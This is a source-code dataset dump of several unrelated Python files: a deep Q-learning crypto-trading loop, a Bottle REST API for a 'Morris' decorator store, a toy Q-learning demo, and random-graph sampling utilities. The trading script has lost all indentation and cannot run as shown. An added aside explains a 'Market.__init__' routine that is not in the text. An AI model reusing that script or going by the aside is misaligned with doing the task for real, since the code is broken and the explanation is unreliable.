price_state = np.array(M.TRAIN.loc[M.position, PRICE_TENSOR_COLS])
if random.random() < epsilon:
act = random.choice(M.ACTIONS)
else:
Q = sess.run(Q_PREDICT, feed_dict = {
X_PRICE_TENSOR : price_state.reshape(-1, len(PRICE_TENSOR_COLS)),
HOLD_W : np.array(M.TRAIN.ix[M.position, M.PORT_W]).reshape( (-1, N_OUT) ),
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
act = M.ACTIONS[np.argmax(Q)]
if t == M.DISCOUNT_STEPS-1 and episode > 1000:
G += M.GAMMA ** (t+1) * max(Q[0])
else:
G += M.GAMMA ** (t+1) * M.step(act)
#for w in M.PORT_W:
# M.TRAIN.set_value(M.position, w, 0)
#M.TRAIN.set_value(M.position, M.PORT_W[M.ACTIONS.index(act)], 1)
targetQ[act_num] = G
PRICE_STATES.append(init_price_state)
Q_PREDS.append(Q1)
Q_TARGETS.append(targetQ)
H_WEIGHTS.append(M.TRAIN.ix[init_pos, M.PORT_W])
if w_index == 0:
usd_target = copy.deepcopy(targetQ)
break
num_depth = 1+max(0, math.log(episode+1)-2)+len(M.TRAIN)#*0.15
num_depth = len(M.TRAIN)
#num_depth = 1024
if len(Q_TARGETS) >= num_depth or True:
COL_W = '\033[0m' # white (normal)
COL_R = '\033[41m' # red
COL_G = '\033[42m' # green
COL_O = '\033[33m' # orange
COL_B = '\033[34m' # blue
COL_P = '\033[35m' # purple
#update_drop_rt = tf.assign(tf_keep_prob, 0.7)
#sess.run(update_drop_rt)
#the_x = np.reshape( np.array(X_STATES), (-1, N_IN) )
the_p = np.reshape( np.array(PRICE_STATES), (-1, len(PRICE_TENSOR_COLS)))
the_q = np.reshape( np.array(Q_TARGETS), (-1, N_OUT))
the_w = np.reshape( np.array(H_WEIGHTS), (-1, N_OUT))
the_p = np.reshape(np.array(M.TRAIN_HOLD[PRICE_TENSOR_COLS]), (-1, len(PRICE_TENSOR_COLS)) )
the_q = np.reshape(np.array(M.TRAIN_HOLD[M.COLS_Y_TRAIN]), (-1, len(M.COLS_Y_TRAIN)) )
the_w = np.reshape(np.array(M.TRAIN_HOLD[M.PORT_W]), (-1, len(M.PORT_W)) )
#for i in range(int(num_depth+0.5)):
i = 0
PR_KEEP_1, PR_KEEP_2, PR_KEEP_3 = 0.70, 0.70, 0.70
use_sample = True
while i < 2000000000:
rates = {0 : 0.0005,
1e4 : 0.0001,
3e4 : 0.00003,
1e6 : 0.00001}
if i in rates:
update_LR = tf.assign(LEARNING_RATE, rates[i])
sess.run(update_LR)
opt = train_step
#opt = train_step_start if i < 200 or random.random() < 0.02 else train_step
#l_func = loss_func_start if i < 200 else loss_func
#opt = train_step
watch.start("Gradient_Update")
if use_sample:
n_samples = min(i//100+500, round(0.2 * len(the_p)) )
#n_samples = 50
#samples = [int(random.random()**0.5 * len(the_p)) for _ in range(n_samples)]
samples = random.sample(range(len(the_p)), n_samples)
x_noise = np.random.normal(0, 0.15, the_p[samples,:].shape)
#y_noise = np.random.normal(-1e-9, 1e-9, the_q[samples,:].shape)
#samples = random.sample(range(len(the_p)), round(0.3*len(the_p)))
sess.run(opt,
feed_dict = {X_PRICE_TENSOR : the_p[samples,:] + x_noise,
Q_TARGET : the_q[samples,:],
HOLD_W : the_w[samples,:],
keep_p1 : PR_KEEP_1, keep_p2 : PR_KEEP_2, keep_p3 : PR_KEEP_3})
else:
sess.run(opt,
feed_dict = {X_PRICE_TENSOR : the_p,
Q_TARGET : the_q,
HOLD_W : the_w,
keep_p1 : PR_KEEP_1, keep_p2 : PR_KEEP_2, keep_p3 : PR_KEEP_3} )
watch.end("Gradient_Update")
if i % 100 == 0:
train_loss = sess.run(loss_func,
feed_dict = {X_PRICE_TENSOR : the_p,
Q_TARGET : the_q,
HOLD_W : the_w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
price_state = np.reshape(M.TEST[PRICE_TENSOR_COLS], (-1, len(PRICE_TENSOR_COLS)) )
truth = np.reshape(M.TEST[M.COLS_Y], (-1, len(M.COLS_Y)) )
w = np.reshape(M.TEST[M.PORT_W], (-1, len(M.PORT_W)) )
test_loss, losing_mean, opt_loss = sess.run([loss_func, losing_trades_mean, opt_func],
feed_dict = {X_PRICE_TENSOR : price_state,
Q_TARGET : truth,
HOLD_W : w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
if test_loss < smallest_loss and i > 1000:
# Add ops to save and restore all the variables.
saver = tf.train.Saver()
# Save the variables to disk.
saver.save(sess, "{}\\model.ckpt".format(Constants.SAVE_PATH))
print("Model saved in path: {}".format(Constants.SAVE_PATH))
M.save()
smallest_loss = test_loss
'''test_loss_trans = sess.run(l_func,
feed_dict = {X_PRICE_TENSOR : price_state,
Q_TARGET : np.reshape(M.TEST[M.COLS_Y_TRAIN], (-1, len(M.COLS_Y_TRAIN)) ),
HOLD_W : w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )'''
train_losses.append(train_loss)
test_losses.append(test_loss)
transf_losses.append(losing_mean)
opt_losses.append(opt_loss)
fig, ax1 = plt.subplots()
plot_window = 1000
train_plot_data = pd.Series(train_losses[-plot_window:]).rolling(5).mean()
test_plot_data = pd.Series(test_losses[-plot_window:]).rolling(5).mean()
transf_plot_data = pd.Series(transf_losses[-plot_window:]).rolling(5).mean()
opt_plot_data = pd.Series(opt_losses[-plot_window:]).rolling(5).mean()
color = 'tab:red'
ax1.set_xlabel('iteration')
ax1.set_ylabel('train loss', color=color)
ax1.plot(range(1, len(train_plot_data)+1), train_plot_data, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('test loss', color=color) # we already handled the x-label with ax1
ax2.plot(range(1, len(test_plot_data)+1), test_plot_data, color=color)
ax2.tick_params(axis='y', labelcolor=color)
ax3 = ax2.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:green'
ax3.set_ylabel('L2 Loss', color=color) # we already handled the x-label with ax1
ax3.plot(range(1, len(transf_plot_data)+1), transf_plot_data, color=color)
ax3.tick_params(axis='y', labelcolor=color)
ax4 = ax3.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:orange'
ax4.set_ylabel('Loss Value', color=color) # we already handled the x-label with ax1
ax4.plot(range(1, len(opt_plot_data)+1), opt_plot_data, color=color)
ax4.tick_params(axis='y', labelcolor=color)
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.show()
DailyReturnTrain = 100 * (10**(-train_losses[-1] * TIMESTEP_DAYS) - 1)
DailyReturnTest = 100 * (10**(-test_losses[-1] * TIMESTEP_DAYS) - 1)
#DailyReturnTrain = -train_losses[-1] * TIMESTEP_DAYS
#DailyReturnTest = -test_losses[-1] * TIMESTEP_DAYS
print("Iteration: {:<10}, Train Loss: {:<.8f}, Test Loss: {:<.8f}, "
"Test Daily Return: {}{:<.2f}%{}".
format(i,train_loss, test_loss, (COL_G if DailyReturnTest > 0 else COL_R), DailyReturnTest, COL_W))
if i % 1000 == 0:
gc.collect()
watch.display()
if i % 100000 == 0 and i > 0:
'''M.TEST = D
M.TEST['MARGIN_USD'] = 0
M.TEST['MARGIN_BMXBTCUSD'] = 0
M.TEST['MARGIN_BMXBTCUSD_S'] = 0
M.TEST['reward_USD'] = 0
M.TEST['reward_BMXBTCUSD'] = M.TEST['close_BMXBTCUSD'].shift(-1) / M.TEST['close_BMXBTCUSD']
M.TEST['reward_BMXBTCUSD'] = M.TEST['reward_BMXBTCUSD'].apply(lambda x : math.log10(x))
M.TEST['reward_BMXBTCUSD_S'] = M.TEST['reward_BMXBTCUSD'].apply(lambda x : -x)
'''
gc.collect()
dat = M.TEST
'''dat = M.data
state = np.array(dat[M.COLS_X])
price_state = np.array(dat[PRICE_TENSOR_COLS])
w = np.array(dat[M.PORT_W])
nn_outs, Q_pred = sess.run([CL_flat, Q_PREDICT], feed_dict = {
X_PRICE_TENSOR : price_state.reshape(-1, len(PRICE_TENSOR_COLS) ),
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1
} )
lst = []
out_data = dat.copy()
out_cols = []
act_cols = []
for idx in range(len(nn_outs[0])):
lst = [x[idx] for x in nn_outs]
c = "NN_OUT_{}".format(idx+1)
out_data[c] = lst
out_cols.append(c)
for idx, action in enumerate(M.ACTIONS):
print(idx, action)
lst = [x[idx] for x in Q_pred]
c = "ACT_{}".format(action)
out_data[c] = lst
out_cols.append(c)
act_cols.append(c)
if idx >= len(M.ACTIONS) / M.MULTS - 1:
break
out_cols += M.COLS_Y[ : len(M.COLS_Y) // M.MULTS ]
out_data[out_cols].to_csv("Crypto Q Data.csv",index=False)
C = sklearn.cluster.KMeans(10)
C.fit(out_data[:len(M.TRAIN)][act_cols])
plt.plot(C.cluster_centers_, 'o')
out_data['state'] = C.predict(out_data[act_cols])
out_cols.append('state')
out_data[out_cols].to_csv("Crypto Q Data.csv",index=False)
#(C.cluster_centers_ - out_data[act_cols])**2
tr = out_data[:len(M.TRAIN)][act_cols]
kMeansVar = [KMeans(n_clusters=k).fit(tr) for k in range(1, 20)]
centroids = [X.cluster_centers_ for X in kMeansVar]
k_euclid = [cdist(tr, cent) for cent in centroids]
dist = [np.min(ke, axis=1) for ke in k_euclid]
wcss = [sum(d**2) for d in dist]
tss = sum(pdist(tr)**2)/tr.shape[0]
bss = tss - wcss
plt.plot(bss)
plt.show()
tr = out_data[:len(M.TRAIN)]
Q = {}
for st in set(out_data.state):
for a in act_cols:
Q[(st,a)] = {}
for a2 in act_cols:
Q[(st,a)][a2] = 0
def getAction(state, epsilon=0.05, bestAct=False):
if random.random() < epsilon:
return random.choice((act_cols))
elif bestAct == False:
return np.random.choice(list(Q[state].keys()), p=softmax(list(Q[state].values())))
else:
best, best_v = None, 0
for k,v in Q[state].items():
if best is None:
best = k
best_v = v
continue
if v > best_v:
best = k
best_v = v
return best
num_iter = 0
loop_forever = True
while loop_forever:
try:
H = random.choice(act_cols)
pos = random.randint(0, len(M.TRAIN)-2)
current_state = tr.at[pos, "state"], H
current_action = getAction(current_state, 0.1, False)
reward = tr.ix[pos, current_action.replace("ACT","reward")]
if H != current_action:
reward += math.log10( 1 - 0.000 )
new_state = tr.at[pos+1, "state"], current_action
next_best_rw = max(Q[new_state].values())
td_target = reward + 0.99 * next_best_rw
td_error = td_target - Q[current_state][current_action]
Q[current_state][current_action] += 0.1 * td_error
num_iter += 1
if num_iter % 20000 == 0:
print(num_iter)
#for k, v in Q[(3,"ACT_IOTA")].items():
# print(k, v)
if num_iter % 100000 == 0:
H = "ACT_USD"
tst = out_data[len(M.TRAIN):].reset_index(drop=True)
raws, tcs, rewards = [], [], []
for pos in range(0, len(tst)-1):
current_state = tst.at[pos, "state"], H
current_action = getAction(current_state, 0, True)
reward = tr.ix[pos, current_action.replace("ACT","reward")]
if H != current_action:
tc = math.log10( 1 - 0.002 )
else:
tc = 0
raws.append(reward)
tcs.append(tc)
rewards.append(reward+tc)
H = current_action
plt.plot(pd.Series(raws).cumsum())
print(list(pd.Series(raws).cumsum())[-1])
gc.collect()
#plt.plot(pd.Series(rewards).cumsum())
plt.show()
except KeyboardInterrupt:
loop_forever = False
break'''
print( len(dat) )
M.position = 0
dat[M.PORT_W] = 0
dat["MARGIN_USD"] = 1
prevHoldings = None
all_qs_out = []
G = []
profits, scaled_profits = [], []
costs, n_switch = [], []
Vs = []
price_states = np.array(dat[PRICE_TENSOR_COLS])
for test_pos in range(0, len(dat)-1):
w = np.array(dat.loc[M.position, M.PORT_W]).reshape(-1, len(M.PORT_W))
Q, V = sess.run([Q_PREDICT, Q_UNSCALED], feed_dict = {
X_PRICE_TENSOR : price_states[test_pos].reshape(-1, len(PRICE_TENSOR_COLS) ),
HOLD_W : w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1
} )
all_qs_out.append(np.round(Q[0], 3))
act = M.ACTIONS[np.argmax(Q)]
if USE_SIGMOID:
binaries = np.apply_along_axis(lambda x : 1 if x > 0.5 else 0, 0, Q)
else:
binaries = [0] * len(M.ACTIONS)
binaries[np.argmax(Q)] = 1
binaries = np.array(binaries)
profit = sum(binaries * dat.ix[M.position, M.COLS_Y])
#if profits:
#profit *= ( 10 ** pd.Series(profits).cumsum()[len(profits)-1] )
tc = 0
if prevHoldings is None:
prevHoldings = binaries
n_switch.append(0)
else:
chng = np.abs(binaries - prevHoldings)
n_switch.append(chng.sum() > 0)
chng = chng * math.log10(1-0.075/100)
#chng = chng * -1
tc = sum(chng)
prevHoldings = binaries
costs.append(tc)
profits.append(profit)
G.append(profit+tc)
M.position += 1
Vs.append( max(0, max(V[0]) ) )
scaled_profits.append(profit * Vs[-1]**0.5 )
#act = M.ACTIONS[np.random.choice(range(len(M.ACTIONS)),
# p = softmax(Q[0]))]
#G.append( M.stepTest(act) )
for w in M.PORT_W:
dat.set_value(M.position, w, 0)
dat.set_value(M.position,
M.PORT_W[M.ACTIONS.index(act)],
1)
if test_pos % 1000 == 0 and test_pos > 0:
print("Switch Rate: {:.2f}%".format( 100.0 * sum(n_switch) / len(n_switch) ))
plt.plot(pd.Series(profits).cumsum())
#plt.plot(pd.Series(G).cumsum())
plt.show()
plt.plot(pd.Series(profits).cumsum())
print("Switch Rate: {:.2f}%".format( 100.0 * sum(n_switch) / len(n_switch) ))
projections.append(pd.Series(G).cumsum())
for num_p, p in enumerate(projections[::-1]):
plt.plot(p)
print(p[len(p)-1])
if num_p >= 10:
break
plt.show()
for idx in range(len(all_qs_out[0])):
hold_data = [x[idx] for x in all_qs_out]
plt.plot(pd.Series(hold_data).rolling(200).mean())
#for c in M.PORT_W:
# plt.plot(pd.rolling_mean(dat[c], 10))
plt.legend(M.PORT_W)
plt.show()
i += 1
watch.end("Gradient_Update")
all_losses.append(train_loss)
rolling_window = 2000
watch.start("rolling_loss")
rolling_loss = np.mean( all_losses[-rolling_window:] )
watch.end("rolling_loss")
#update_drop_rt = tf.assign(tf_keep_prob, 1)
#sess.run(update_drop_rt)
Q_NEW = sess.run(Q_PREDICT, feed_dict = {
X_PRICE_TENSOR : np.reshape(USD_PRICE_STATE,(-1, len(PRICE_TENSOR_COLS)) ),
HOLD_W : W_USD, # Q_PREDICT depends on the HOLD_W placeholder; the other sess.run calls feed it too
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1
} )
print("Episode: {:<12}, Rolling Loss: {:.6f}, Position: {}".format(
episode, rolling_loss*10**5, init_pos))
print("Target: {:<24}, Pred: {:<24}, Upd: {:<24}, Epsilon: {:.2f}%".format(
"["+"".join(["{}{:<6.3f}%\033[0m ".format(COL_R if x < 0 else G, 100*(10**x-1))
for x in usd_target])+"]",
"["+"".join(["{}{:<6.3f}%\033[0m ".format(COL_R if x < 0 else G, 100*(10**x-1))
for x in Q_USD[0]])+"]",
"["+"".join(["{}{:<6.3f}%\033[0m ".format(COL_R if x < 0 else G, 100*(10**x-1))
for x in (Q_NEW-Q_USD)[0]])+"]",
100*epsilon))
#print(episode, targetQ[0], Q1[0], (Q_NEW-Q1)[0], loss, "{:.6f}".format(epsilon))
X_STATES, PRICE_STATES, Q_PREDS, Q_TARGETS = [], [], [], []
epsilon = 10/((episode/500) + 10)
epsilon = max(0.001, epsilon)
epsilon = 0
if episode % 500 == 0:
watch.display()
episode += 1
authors: ["noreply@github.com"]
author_id: rendorHaevyn.noreply@github.com
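The core of `Market.__init__` above builds its n-step discounted training targets by assembling a pandas expression as a string and `exec`-ing it. A minimal sketch (my names, not the repo's) of the same computation done directly, which may make the `GAMMA`/`DISCOUNT_STEPS` arithmetic easier to follow:

```python
# Sketch of the exec-built statement: for each reward column c,
#   train_c[t] = sum_{k=0..steps} gamma**k * reward_c[t+k]
# using plain pandas instead of a string expression.
import pandas as pd

def discounted_targets(df: pd.DataFrame, reward_cols, gamma: float, steps: int) -> pd.DataFrame:
    out = pd.DataFrame(index=df.index)
    for c in reward_cols:
        target = df[c].copy()
        for k in range(1, steps + 1):
            target = target + (gamma ** k) * df[c].shift(-k)  # look-ahead rewards
        # tail rows become NaN, mirroring the dropna in the original
        out[c.replace("reward_", "train_")] = target
    return out

# toy example: two periods of look-ahead, gamma = 0.5
df = pd.DataFrame({"reward_BTC": [0.01, -0.02, 0.03, 0.00, 0.01]})
print(discounted_targets(df, ["reward_BTC"], gamma=0.5, steps=2))
```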
---
blob_id: f0b2fd63ab10a9a07a323590d9f9ac4a841cc01d
directory_id: 07a4d568e01ed82ab71f4a5e0916c872249c23c3
path: /morris_api.py
content_id: 43128f9d9165881b45912c10c32025e04e6ded94
detected_licenses: ["CC0-1.0", "LicenseRef-scancode-public-domain"]
license_type: permissive
repo_name: joshuaeveleth/MorrisDataDecorator
snapshot_id: 04d20bc5c3d0e78f754e47df7ba0315fe38507b5
revision_id: a148b579082772c9e43f1aad484e5f8a3520ecc1
branch_name: refs/heads/master
visit_date: 2021-01-12T08:01:44.073946
revision_date: 2014-07-30T19:23:58
committer_date: 2014-07-30T19:23:58
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 4,715
extension: py
content:
from bottle import Bottle, template, request, TEMPLATE_PATH, static_file, response
import morris
import morris_memory
import morris_solr
import StringIO
import sys
import logging
import morris_config

logger = logging.getLogger('morris_api_logger')
hdlr = logging.FileHandler('../logs/morris_api.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)

app = Bottle()

# This is a global we want to remain in memory for all persistence
# across all calls...at least for now.
# md = morris_memory.InMemoryMorrisDecorator()
SOLR_URL = "http://localhost:8983/solr"

# We can also test the InMemory Module here. I need to
# make this more configurable.
md = morris_solr.SolrMorrisDecorator(morris_config.SOLR_URL) if\
    (morris_config.USE_SOLR_AS_PERSISTENCE) else\
    morris.InMemoryMorrisDecorator()

@app.route('/ping_morris_api', method='GET')
def trivtest():
    return "true"

# Obviously, this should be used cautiously.
# It exists mainly to support testing through the API.
@app.route('/delete_all', method='GET')
def delete_all():
    md.deleteAll()

#BEGIN DECORATION SECTION
@app.route('/decoration', method='GET')
def read_all_decorations():
    records = {'data': md.getAllDecorations()}
    return records

@app.route('/decoration_export', method='GET')
def export_all_decorations_as_csv():
    return md.exportDecorationsAsCSV()

@app.route('/decoration_records', method='GET')
def export_all_records_as_csv():
    return md.exportDecorationsToContentsAsCSV()

@app.route('/decoration_records_with_client_data/<columns>', method='GET')
def export_all_records_as_csv_with_client_data(columns):
    cols = columns.split(',')
    return md.exportDecorationsToContentsAsCSVWithClientDataColumns(cols)

@app.route('/content_records_with_client_data/<columns>', method='GET')
def export_all_records_as_csv_with_client_data(columns):
    cols = columns.split(',')
    return md.exportContentsToDecorationsAsCSVWithClientDataColumns(cols)

@app.route('/decoration/<name>', method='GET')
def read_decoration(name):
    records = md.getContentsForDecoration(name)
    return {'data': records}

# I tried to do this as an actual delete, which would make more sense.
# Unfortunately, I couldn't get bottle to recognize it.
# This would be much improved if it returned the number deleted.
@app.post('/delete_decoration/<name>')
def delete_decoration(name):
    md.deleteDecorations([name])
    return { "success" : True, "error" : "" }

@app.route('/content/<name>', method='GET')
def read_decoration(name):
    records = md.getDecorationsForContent(name)
    return {'data': records}

@app.route('/decoration/<name>', method='POST')
def create_decoration(name):
    success = str(md.createDecorations([name]))
    return success

@app.route('/content/<name>', method='POST')
def create_content(name):
    success = str(md.createContents([name]))
    return success

@app.route('/decoration/add_client_data/<decoration>/<data_name>/<cd:path>', method='POST')
def add_client_data_decoration(decoration, data_name, cd):
    md.addClientDataDecoration(decoration, data_name, cd)
    return {}

@app.route('/content/add_client_data/<content>/<data_name>/<cd:path>', method='POST')
def add_client_data_content(content, data_name, cd):
    md.addClientDataContent(content, data_name, cd)
    return {}

@app.route('/test/add_client_data/<content>/<data_name>/<cd:path>', method='POST')
def test_content(content, data_name, cd):
    md.addClientDataContent(content, data_name, "spud")
    return {}

@app.route('/decoration/add_record/<decoration>/<key>', method='POST')
def add_record_to_decoration(decoration, key):
    logger.info("Called add_record_to_decoration({0},{1})".format(decoration, key))
    return md.associateDecorationWithContentSingle(decoration, key)

@app.route('/decoration/<name>', method='DELETE')
def delete_decoration(name="Mystery Recipe"):
    return { "success" : False, "error" : "delete not implemented yet" }

@app.route('/delete_association/<decoration>/<content>', method='POST')
def delete_association(decoration, content):
    return md.deleteAssociation(decoration, content)

#END DECORATION SECTION
#BEGIN MORRIS CONTENT MANAGEMENT
@app.route('/record', method='GET')
def get_an_arbitrary_record():
    return { "content" : "This is the first record. But not really." }

@app.route('/record_integer/<tag>/<key>', method='GET')
def get_record_integer(tag, key):
    return md.getRecordInteger(tag, key)

@app.route('/record_integer/<tag>/<key>/<delta>', method='POST')
def get_record_integer(tag, key, delta):
    return md.changeRecordInteger(tag, key, delta)

#END MORRIS CONTENT MANAGEMENT
authors: ["read.robert@gmail.com"]
author_id: read.robert@gmail.com
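The module above only builds the `app` object and registers routes; nothing in this file serves it. A minimal sketch of one way such a Bottle app is typically run (host and port here are assumptions, not values from the repo):

```python
# Hypothetical runner for the morris_api module above.
from morris_api import app

if __name__ == '__main__':
    # bottle's built-in development server; a WSGI server would be used in production
    app.run(host='localhost', port=8080, debug=True)
```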
---
blob_id: 355a6738a78d86716336d103611c3358a7811bbf
directory_id: d4b775d45053fb791392d956da1f0c427a869e78
path: /search.py
content_id: f852f5dc2e3ba88461c30a46961114b927a25f93
detected_licenses: []
license_type: no_license
repo_name: sirlancer/reinforcement_learning
snapshot_id: 545d6cbf0c1f6986b2a7f1b1dea0c7495d20d2a6
revision_id: f4a23c76a89f9d4babe9a345c5e125f061f25620
branch_name: refs/heads/master
visit_date: 2021-01-23T22:30:55.311524
revision_date: 2017-09-09T08:22:11
committer_date: 2017-09-09T08:22:11
github_id: 102,938,391
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 2,360
extension: py
content:
import numpy as np
import pandas as pd
import time

np.random.seed(2)

N_STATES = 6
ACTIONS = ['left', 'right']
EPSILON = 0.9
ALPHA = 0.1
LAMBDA = 0.9
# number of training episodes
MAX_EPISODES = 13
FRESH_TIME = 0.3

# build the Q table
def build_q_table(n_states, actions):
    table = pd.DataFrame(np.zeros((n_states, len(actions))), columns=actions)
    return table

# choose an action for the current state
def choose_action(state, q_table):
    state_actions = q_table.iloc[state, :]
    if (np.random.uniform() > EPSILON) or (state_actions.all() == 0):
        action_name = np.random.choice(ACTIONS)
    else:
        # idxmax returns the column label (action name); the removed .argmax did so on old pandas
        action_name = state_actions.idxmax()
    return action_name

# interact with the environment
def get_env_feedback(S, A):
    if A == 'right':
        R = 1
        if S == 5:
            S_ = 'termination'
        else:
            S_ = S + 1
    else:
        R = -1
        if S == 0:
            S_ = S
        else:
            S_ = S - 1
    return S_, R

# update the environment display
def update_env(S, episode, step_counter):
    env_list = ['-']*(N_STATES - 1) + ['T']
    if S == 'termination':
        interaction = 'Episode %s: total_steps = %s' % (episode+1, step_counter)
        print('\r{}'.format(interaction), end='')
        time.sleep(2)
        print()
    else:
        env_list[S] = 'o'
        interaction = ''.join(env_list)
        print('\r{}'.format(interaction), end='')
        time.sleep(FRESH_TIME)

def rl():
    q_table = build_q_table(N_STATES, ACTIONS)
    for episode in range(MAX_EPISODES):
        step_counter = 0
        S = 0
        is_terminated = False
        update_env(S, episode, step_counter)
        while not is_terminated:
            A = choose_action(S, q_table)
            S_, R = get_env_feedback(S, A)
            q_predict = q_table.loc[S, A]  # .loc replaces the long-removed .ix indexer
            if S_ != 'termination':
                q_target = R + LAMBDA * q_table.iloc[S_, :].max()
            else:
                q_target = R
                is_terminated = True
            q_table.loc[S, A] = (1 - ALPHA) * q_predict + ALPHA * q_target
            S = S_
            update_env(S, episode, step_counter+1)
            step_counter += 1
        # print(q_table)
    print(q_table)
    return q_table

if __name__ == '__main__':
    # table = build_q_table(N_STATES, ACTIONS)
    rl()
authors: ["920365914@qq.com"]
author_id: 920365914@qq.com
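The update inside `rl()` above is the standard tabular Q-learning rule, `Q(s,a) <- (1 - ALPHA) * Q(s,a) + ALPHA * (R + LAMBDA * max_a' Q(s',a'))`. One hand-worked step with made-up numbers, to make the arithmetic concrete:

```python
# One Q-learning update matching rl() above; the state values are invented.
ALPHA, LAMBDA = 0.1, 0.9
q_sa = 0.0          # current estimate Q(s, 'right')
r = 1               # reward for moving right (see get_env_feedback)
max_q_next = 0.5    # assumed best value in the successor state

q_target = r + LAMBDA * max_q_next            # 1 + 0.9 * 0.5 = 1.45
q_sa = (1 - ALPHA) * q_sa + ALPHA * q_target  # 0.9 * 0.0 + 0.1 * 1.45 = 0.145
print(q_sa)
```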
---
blob_id: 795516fb98dfa791ca739785a945225f18ddd615
directory_id: a8b311f6c579a70cdca12cdff73aca18ddf5e1f4
path: /DataAnalysisMethods2/2cvic.py
content_id: 79b6e882c9b92b0d404833d23c1e9d09cd035cce
detected_licenses: []
license_type: no_license
repo_name: MarekUlip/CollegePythonScripts
snapshot_id: ec09c7730752b7bd6b85fe523470acf9d124df53
revision_id: 9133a864ab301d9076394ce9345faa5c2c878adf
branch_name: refs/heads/master
visit_date: 2022-11-13T12:15:56.198341
revision_date: 2020-07-06T22:26:26
committer_date: 2020-07-06T22:26:26
github_id: 277,658,408
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 7,111
extension: py
content:
import csv
import math
import os
import random
import matplotlib.pyplot as plt

def count_min_probabilty(n):
    return math.log(n) / n

def count_prop_for_edges(num_of_edges, n):
    return (num_of_edges * 2) / (n * (n - 1))

def create_random_graph(n, p):
    edges = []
    # p should be greater than 0.000921 for 10000 vertices - the sharp threshold above which the network is connected
    matrix = [[0 for x in range(n)] for y in range(n)]
    for i in range(n):
        for j in range(n):
            col = j + i + 1
            if col >= n:
                break
            rnd = random.random()
            if rnd < p:
                matrix[i][col] = 1
                edges.append([i, col])
                matrix[col][i] = 1
    # [print(row) for row in matrix]
    # write_vertices_to_csv(edges,"random-chart.csv")
    return matrix

def create_barabasi_albert_graph_dynamic(n, m, m0):
    edges = []
    vertice_count = n - m0
    current_count = m0
    vertice_list = []
    for i in range(m0):
        for j in range(m0 - 1):
            vertice_list.append(i)
    neighbour_matrix = [[0 for x in range(n)] for y in range(n)]
    for i in range(m0 - 1):
        for j in range(1, m0):
            if i == j:
                continue
            edges.append([i, j])
            neighbour_matrix[i][j] = neighbour_matrix[j][i] = 1
    # print(edges)
    # print(vertice_list)
    for i in range(vertice_count):
        v_neighs = []
        for j in range(m):
            rnd = random.randint(0, len(vertice_list) - 1)
            if vertice_list[rnd] not in v_neighs:
                v_neighs.append(vertice_list[rnd])
        for neigh in v_neighs:
            vertice_list.insert(vertice_list.index(neigh), neigh)
            edges.append([current_count, neigh])
            neighbour_matrix[current_count][neigh] = neighbour_matrix[neigh][current_count] = 1
        for j in range(m):
            vertice_list.append(current_count)
        current_count += 1
    # write_vertices_to_csv(edges,"barabasi-albert.csv")
    # print("Vertice list: {} {}".format(vertice_list, vertice_count))
    return neighbour_matrix

def random_node_sampling(matrix, p, limit_on_p):
    n = len(matrix)
    edges = []
    nodes = []
    for i in range(n):
        rnd = random.random()
        if p > rnd:
            nodes.append(i)
            for index, item in enumerate(matrix[i]):
                if item > 0:
                    if index not in nodes:
                        nodes.append(index)
                    edges.append([i, index])
        if limit_on_p and len(nodes) > len(matrix) * p:
            print("Limiting with count {}".format(len(nodes)))
            return [edges, nodes]
    print(len(nodes))
    # print(len(edges))
    return [edges, nodes]

def degree_based_sampling(matrix, p, limit_on_p):
    n = len(matrix)
    edges = []
    nodes = []
    for i in range(n):
        rnd = random.random()
        degree = sum(matrix[i])
        passed = False
        if degree == 0:
            passed = p > rnd
        else:
            # original had "passed = p / degree", which is truthy for any nonzero
            # float; comparing against rnd matches the commented-out variants
            passed = (p / degree) > rnd
        if passed:
            nodes.append(i)
            for index, item in enumerate(matrix[i]):
                if item > 0:
                    if index not in nodes:
                        nodes.append(index)
                    edges.append([i, index])
        if limit_on_p and len(nodes) > len(matrix) * p:
            print("Limiting with count {}".format(len(nodes)))
            return [edges, nodes]
    print(len(nodes))
    # print(len(edges))
    return [edges, nodes]

def cummulative_distribution(X, matrix, nodes, method_name, max_degree=0):
    degrees = [sum(row) for index, row in enumerate(matrix) if index in nodes]
    max_degree = max(degrees)
    rel_degrees = [degree / max_degree for degree in degrees]
    counts = {}
    for degree in sorted(degrees):
        counts[degree] = counts.get(degree, 0) + 1
    cumm = 0
    distribution = []
    for key in counts:
        counts[key] /= len(nodes)
        cumm += counts[key]
        distribution.append([key / max_degree, cumm])
    print("Dist len: {}".format(len(distribution)))
    # print(counts)
    # print(distribution)
    plt.plot([point[0] for point in distribution], [point[1] for point in distribution], label=method_name)

def plot_chart(file_name):
    # plt.axis([0, 1.0, 0, 1.0])
    plt.title("Degree cummulative distribution")
    plt.xlabel("relative degree")
    plt.ylabel("relative cummulative frequency")
    plt.legend()
    path = os.getcwd() + file_name + ".png"
    os.makedirs(os.path.dirname(path), exist_ok=True)
    # print(path)
    plt.savefig(path)
    plt.clf()

def get_max_degree(matrix, nodes):
    degrees = [sum(row) for index, row in enumerate(matrix) if index in nodes]
    return max(degrees)

def safe_matrix_as_csv(matrix, name):
    edges = []
    # print(sum([sum(row) for row in matrix]))
    for index, row in enumerate(matrix):
        for col_index, col in enumerate(row):
            if col == 1:
